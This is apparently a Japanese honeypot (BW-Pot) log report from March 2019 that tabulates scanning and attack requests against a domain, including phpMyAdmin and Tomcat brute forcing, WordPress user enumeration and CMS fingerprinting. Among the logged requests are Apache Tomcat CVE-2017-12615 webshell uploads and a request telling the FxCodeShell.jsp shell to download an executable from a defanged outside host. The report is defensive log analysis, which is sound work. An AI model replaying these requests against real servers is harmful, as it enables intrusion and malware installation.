BW-Potのログ分析 (2019/03/28)

BW-Pot

中国にある1つのIPからドメインあてに多数の通信が来ました。
以下の表にある通信件数が1件の通信は、ほぼすべて同一の送信元からの通信でした。
通信のほとんどが意図がわからず、不明としてあります。

後日時間があれば調査しようと思います。

件数 種別 リクエス
360 phpMyAdminに関する攻撃 POST /phpmyadmin/
283 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
48 アクセス GET /
10 WordPressに関する調査 GET /wp-login.php
9 WordPressへのログイン試行 POST /wp-login.php
5 WordPressXML-RPCに関する攻撃 POST /xmlrpc.php
2 不正中継の調査 GET api.binance[.]com/api/v1/time
2 クローリング HEAD /robots.txt
1 WordPressのユーザー情報の取得 GET ///?author=1
1 WordPressのユーザー情報の取得 GET ///wp-json/wp/v2/users/
1 不明 GET /404.jpg
1 不明 GET /?q=login.destroy.session&r=0.01231231230
1 不明 GET /API/DW/Dwplugin/SystemLabel/SiteConfig.htm
1 不明 GET /API/DW/Dwplugin/TemplateManage/login_site.htm
1 不明 GET /API/DW/Dwplugin/TemplateManage/manage_site.htm
1 不明 GET /API/DW/Dwplugin/TemplateManage/save_template.htm
1 不明 GET /API/DW/Dwplugin/ThirdPartyTags/SiteFactory.xml
1 不明 GET /Admin/Common/HelpLinks.xml
1 不明 GET /Admin/Images/LoginImages/admin_text.gif
1 不明 GET /Admin/Images/LoginImages/admin_top.gif
1 不明 GET /Admin/Login.aspx
1 不明 GET /CHANGELOG.txt
1 CuteEditorに関する調査 GET /CuteSoft_Client/CuteEditor/Help/default.htm
1 CuteEditorに関する調査 GET /CuteSoft_Client/CuteEditor/ImageEditor/listfiles.aspx
1 CuteEditorに関する調査 GET /CuteSoft_Client/CuteEditor/Images/log.gif
1 CuteEditorに関する調査 GET /CuteSoft_Client/CuteEditor/Style/IE.css
1 不明 GET /Editor.js
1 不明 GET /Error.aspx
1 FCKeditorに関する調査 GET /FCK/editor/js/fckeditorcode_ie.js
1 FCKeditorに関する調査 GET /FCK/fckeditor.js
1 Apache Tomcat脆弱性(CVE-2017-12615)を利用した攻撃 PUT /FxCodeShell.jsp%20
1 Apache Tomcat脆弱性(CVE-2017-12615)を利用した攻撃 PUT /FxCodeShell.jsp/
1 Apache Tomcat脆弱性(CVE-2017-12615)を利用した攻撃 PUT /FxCodeShell.jsp::$DATA
1 Apache Tomcat脆弱性(CVE-2017-12615)を利用した攻撃 GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid.hognoob[.]se/download.exe
1 不明 GET /HNAP1
1 不明 GET /Help
1 不明 GET /Images/login/biaoti.jpg
1 不明 GET /Images/login/lefttu.jpg
1 不明 GET /Images/login/mainlogo.gif
1 不明 GET /Include/EcsServerApi.js
1 不明 GET /Install/logo.gif
1 不明 GET /License.txt
1 NMAPによるスキャン GET /Nmap/folder/check1553713171
1 NMAPによるスキャン GET /NmapUpperCheck1553713171
1 不明 GET /Ntalker/lawfirm.aspx?17
1 不明 GET /Prompt/images/P_Wrong.gif
1 不明 GET /Public/Admin/Images/login_main_bg.jpg
1 不明 GET /README.txt
1 不明 GET /Scripts/jquery/maticsoft.jquery.min.js
1 不明 GET /Search.html
1 不明 GET /Site/Pages/WebResources.ashx/PoweredByKodakImage
1 不明 GET /Site/SystemThemes/7917A0869761B5458281E407AE0090F5/Images/ISBanner58px.jpg
1 不明 GET /Template/Default/Skin/user/images/login_back.jpg
1 不明 GET /User/Login.aspx
1 不明 GET /UserCenter/css/admin/bgimg/admin_all_bg.png
1 不明 GET /Wq_StranJF.js
1 不明 GET /about/version
1 不明 GET /addons/theme/stv1/_static/image/favicon.ico
1 不明 GET /addons/theme/stv1/_static/ts2/layout.css
1 不明 GET /addons/theme/stv2/_static/ts2/layout.css
1 不明 GET /admin
1 不明 GET /admin.php
1 不明 GET /admin.php?mod=profile&u_key=123456
1 不明 GET /admin/
1 不明 GET /admin/SouthidcEditor/ButtonImage/standard/componentmenu.gif
1 不明 GET /admin/SouthidcEditor/Dialog/dialog.js
1 不明 GET /admin/SouthidcEditor/ewebeditor.asp?id=57&style=southidc
1 不明 GET /admin/admin_login.php?act=login
1 不明 GET /admin/editor/
1 不明 GET /admin/editor/?c=4e5e5d7364f443e28fbf0d3ae744a59a
1 不明 GET /admin/editor/asp.net/README.txt
1 不明 GET /admin/editor/examples/file-manager.html
1 不明 GET /admin/editor/examples/index.html
1 不明 GET /admin/editor/examples/readonly.html
1 不明 GET /admin/editor/kindeditor-min.js
1 不明 GET /admin/editor/kindeditor.js
1 不明 GET /admin/editor/lang/en.js
1 不明 GET /admin/editor/plugins/anchor/anchor.js
1 不明 GET /admin/editor/plugins/filemanager/filemanager/js
1 不明 GET /admin/editor/themes/default/default.css
1 不明 GET /admin/inc/xml.xslt
1 不明 GET /admin/index.php
1 不明 GET /admin/js/IdSUtil.js
1 不明 GET /admin/login.asp
1 不明 GET /admin/login.aspx
1 不明 GET /admin/login.php
1 不明 GET /admin/start/index.php
1 不明 GET /admin/template/article_more/config.htm
1 不明 GET /administrator/manifests/files/joomla.xml
1 不明 GET /adminsoft/templates/images/login_bg_top.jpg
1 不明 GET /advfile/ad12.js
1 不明 GET /api/api_user.xml
1 GET api.binance.com/api/v1/ticker/24hr?symbol=BTCUSDT
1 不明 GET /app/Tpl/fanwe_1/js/DD_belatedPNG_0.0.8a-min.js
1 不明 GET /app/home/skins/default/style.css
1 不明 GET /app/images/login/logo.png
1 不明 GET /app/images/login/toplogo.gif
1 不明 GET /app/js/source/wcmlib/WCMConstants.js
1 不明 GET /app/login.jsp
1 不明 GET /apps/admin/_static/image/login_box_bg.png
1 不明 GET /archive/archive.css
1 不明 GET /archiver
1 不明 GET /archiver/
1 不明 GET /asp.net/README.txt
1 不明 GET /auth/login
1 不明 GET /back/scripts/jspxcms_choose.js
1 不明 GET /base/login/login.php
1 不明 GET /bbs/
1 不明 GET /bbs/?c=4e5e5d7364f443e28fbf0d3ae744a59a
1 不明 GET /bbs/admin/login.php
1 不明 GET /bbs/archive/archive.css
1 不明 GET /bbs/archiver
1 不明 GET /bbs/archiver/
1 不明 GET /bbs/clientscript/vbulletin_ajax_htmlloader.js
1 不明 GET /bbs/extern.php?action=feed&type=atom
1 不明 GET /bbs/favicon.ico
1 不明 GET /bbs/forum.php
1 不明 GET /bbs/forums/list.page
1 不明 GET /bbs/images/logo_88x31.gif
1 不明 GET /bbs/inc/Templates/rss.xslt
1 不明 GET /bbs/index.php
1 不明 GET /bbs/licence.txt
1 不明 GET /bbs/max-templates/classic/styles/app.css
1 不明 GET /bbs/public/js/ipb.js
1 不明 GET /bbs/robots.txt
1 不明 GET /bbs/rss.aspx
1 不明 GET /bbs/rss.php
1 不明 GET /bbs/tools/rss.aspx
1 不明 GET /bbs/uc_server/control/admin/db.php
1 不明 GET /bencandy.php
1 不明 GET /cgi/index.cgi
1 不明 GET /changelog.txt
1 不明 GET /ckeditor/ckeditor.js
1 不明 GET /ckeditor/ckfinder/ckfinder.html
1 不明 GET /ckeditor/ckfinder/install.txt
1 不明 GET /ckfinder/ckfinder.html
1 不明 GET /ckfinder/install.txt
1 不明 GET /clientscript/vbulletin_ajax_htmlloader.js
1 不明 GET /common/common.js
1 不明 GET /common/help/images/helplogo.gif
1 不明 GET /common/help/images/helplogo_zh.gif
1 不明 GET /console/auth/reg_newuser.jsp
1 不明 GET /console/include/not_login.htm
1 不明 GET /console/js/CTRSRequestParam.js
1 不明 GET /console/js/CWCMDialogHead.js
1 不明 GET /coremail/common/help/images/helplogo.gif
1 不明 GET /coremail/common/help/images/helplogo_zh.gif
1 不明 GET /custom/SkinTemplate/skin/public/images/sys-logo-1caitong-180.jpg
1 不明 GET /customdir/images/english_logo.jpg
1 不明 GET /data/admin/ver.txt
1 不明 GET /data/images/wap_logo.gif
1 不明 GET /datacenter/downloadApp/showDownload.do
1 不明 GET /default/css/em_css.css
1 不明 GET /default/images/logo.gif
1 不明 GET /deptWebsiteAction.do
1 不明 GET /dialog/dialog.js
1 不明 GET /digg.php
1 不明 GET /docs.css
1 不明 GET /docs/
1 不明 GET /docs/DOCUMENTATION.txt
1 不明 GET /doku.php
1 不明 GET /e/master/login.aspx
1 不明 GET /eams/static/scripts/grade/course/input.js
1 FCKeditorに関する調査 GET /editor/fckeditor.js
1 FCKeditorに関する調査 GET /editor/js/fckeditorcode_ie.js
1 不明 GET /examples/file-manager.html
1 不明 GET /examples/index.html
1 不明 GET /examples/readonly.html
1 不明 GET /extern.php?action=feed&type=atom
1 不明 GET /extman/default/images/logo.gif
1 アクセス GET /favicon.ico
1 FCKeditorに関する調査 GET /fckeditor.js
1 不明 GET /fckeditor/editor/dtd/fck_dtd_test.html
1 FCKeditorに関する調査 GET /fckeditor/editor/js/fckeditorcode_ie.js
1 不明 GET /fckeditor/fckconfig.js
1 FCKeditorに関する調査 GET /fckeditor/fckeditor.js
1 不明 GET /fckeditor/license.txt
1 不明 GET /feed.asp
1 不明 GET /forum.php
1 不明 GET /forum/
1 不明 GET /forums/list.page
1 不明 GET /help/ch_gb/images/help-title.gif
1 不明 GET /help/en/h_authenticate.html
1 不明 GET /help/user/index.html
1 不明 GET /helpnew/faq/faq_simple_zh_CN.jsp
1 不明 GET /history.txt
1 不明 GET /ids/admin/login.jsp
1 不明 GET /ids/admin/userhome/forgetPwd.jsp
1 不明 GET /images/2_11.gif
1 不明 GET /images/Default_bg_002.gif
1 不明 GET /images/branding/logo.gif
1 不明 GET /images/default/post_bt.gif
1 不明 GET /images/favicon.ico
1 不明 GET /images/hwem.css
1 不明 GET /images/login/eyoumail.gif
1 不明 GET /images/login/icon-up.gif
1 不明 GET /images/login/logo.gif
1 不明 GET /images/login9/login_33.jpg
1 不明 GET /images/login_Name.jpg
1 不明 GET /images/logo-white.png
1 不明 GET /images/logo_88x31.gif
1 不明 GET /images/logo_product-cml.png
1 不明 GET /images/zh-CN/logo.ico
1 不明 GET /imagesschool/style1/flash2.jpg
1 不明 GET /img/pic/login/top-left.jpg
1 不明 GET /inc/Templates/rss.xslt
1 不明 GET /inc/playerKinds.xml
1 不明 GET /inc/rsd.php
1 不明 GET /include/dedeajax2.js
1 不明 GET /include/dialog/config.php
1 不明 GET /include/install_ocx.aspx
1 不明 GET /includes/general.js
1 不明 GET /index.cgi
1 不明 GET /index.php
1 不明 GET /index.php?m=admin
1 不明 GET /index.php?m=admin&c=index&a=login&pc_hash=
1 不明 GET /index.php?m=search
1 不明 GET /index.php?m=wap
1 不明 GET /install
1 不明 GET /issmall/
1 不明 GET /jcms/index.jsp
1 不明 GET /jcms/index_jcms.jsp
1 不明 GET /js/ajax_x.js
1 不明 GET /js/buttons.js
1 不明 GET /kindeditor-min.js
1 不明 GET /kindeditor.js
1 不明 GET /ks_inc/ajax.js
1 不明 GET /lang/en.js
1 不明 GET /licence.txt
1 不明 GET /list.php
1 不明 GET /login/Jeecms.do
1 不明 GET /m
1 不明 GET /maintlogin.jsp
1 不明 GET /master/login.aspx
1 不明 GET /max-templates/classic/styles/app.css
1 不明 GET /media/com_hikashop/js/hikashop.js
1 不明 GET /member/space/company/info.txt
1 不明 GET /new_gb/help/images/usage/3.3.gif
1 不明 GET /next/img/logo.gif
1 NMAPによるスキャン GET /nmaplowercheck1553713171
1 不明 GET /nobody/mobile.htm?Login=Captcha
1 phpMyAdminに関する調査 GET /phpMyAdmin/scripts/setup.php
1 不明 GET /phpmyadmin/
1 不明 GET /phpmyadmin/Documentation.html
1 不明 GET /phpmyadmin/README
1 不明 GET /phpmyadmin/docs.css
1 不明 GET /phpmyadmin/favicon.ico
1 不明 GET /phpmyadmin/themes/original/img/logo_right.png
1 不明 GET /plug/publish
1 不明 GET /plugin.php?id=milu_seotool:sitemap&tpl=no&myac=milu_seotool_cron&inajax=1
1 不明 GET /plugins/anchor/anchor.js
1 不明 GET /plugins/filemanager/filemanager/js
1 不明 GET /plus/download.php
1 不明 GET /plus/heightsearch.php
1 不明 GET /plus/rssmap.html
1 不明 GET /plus/sitemap.html
1 不明 GET /pub/guiedit/guiedit.js
1 不明 GET /pub/skins/pmwiki/pmwiki.css
1 不明 GET /public/about.html
1 不明 GET /public/js/ipb.js
1 不明 GET /readme.html
1 クローリング GET /robots.txt
1 不明 GET /rss.aspx
1 不明 GET /rss.php
1 不明 GET /script/login.js
1 不明 GET /script/valid_formdata.js
1 NMAPによるスキャン POST /sdk
1 不明 GET /siteserver/login.aspx
1 不明 GET /siteserver/upgrade/default.aspx
1 不明 GET /skin/frontend/default/modern/css/styles.css
1 不明 GET /static/hgicon.png
1 不明 GET /static/images/logo/webserver_small.gif
1 不明 GET /style/default/hdwiki.css
1 不明 GET /stylesheet.css
1 不明 GET /system/Login.aspx
1 不明 GET /system/Update.aspx
1 不明 GET /system/language/zh-cn.xml
1 不明 GET /system/skins/default/system.login.htm
1 不明 GET /template/1/bluewise/_files/jspxcms.css
1 不明 GET /template/home.htm
1 不明 GET /templates/jsn_glass_pro/ext/hikashop/jsn_ext_hikashop.css
1 不明 GET /test_404_page/
1 不明 GET /themes/default/default.css
1 不明 GET /themes/default/graphics/favicon.ico
1 不明 GET /themes/default/graphics/horde-power1.png
1 不明 GET /themes/graphics/horde-power1.png
1 不明 GET /tools/rss.aspx
1 不明 GET /tpl/login/user/images/login_bg_1.jpg
1 不明 GET /tpl/user/tpl1/css/skins/blue.css
1 不明 GET /uc_server/control/admin/db.php
1 phpMyAdminに関する調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 不明 GET /wcm/
1 不明 GET /wcm/?c=4e5e5d7364f443e28fbf0d3ae744a59a
1 不明 GET /wcm/app/images/login/logo.png
1 不明 GET /wcm/app/images/login/toplogo.gif
1 不明 GET /wcm/app/js/source/wcmlib/WCMConstants.js
1 不明 GET /wcm/app/login.jsp
1 不明 GET /wcm/console/auth/reg_newuser.jsp
1 不明 GET /wcm/console/include/not_login.htm
1 不明 GET /wcm/console/js/CTRSRequestParam.js
1 不明 GET /wcm/console/js/CWCMDialogHead.js
1 不明 GET /web2/login_template/1.files/Logo1.jpg
1 不明 GET /webbuilder/script/locale/wb-lang-zh_CN.js
1 不明 GET /whir_system/login.aspx
1 不明 GET /whir_system/module/security/login.aspx
1 不明 GET /wp-cron.php
1 WordPressのユーザー情報の取得 GET /wp-json/wp/v2/users/
1 不明 GET /ycportal/js/wbTextBox/showimg.jsp
1 不明 GET /ymail/images/index_r1_c4.jpg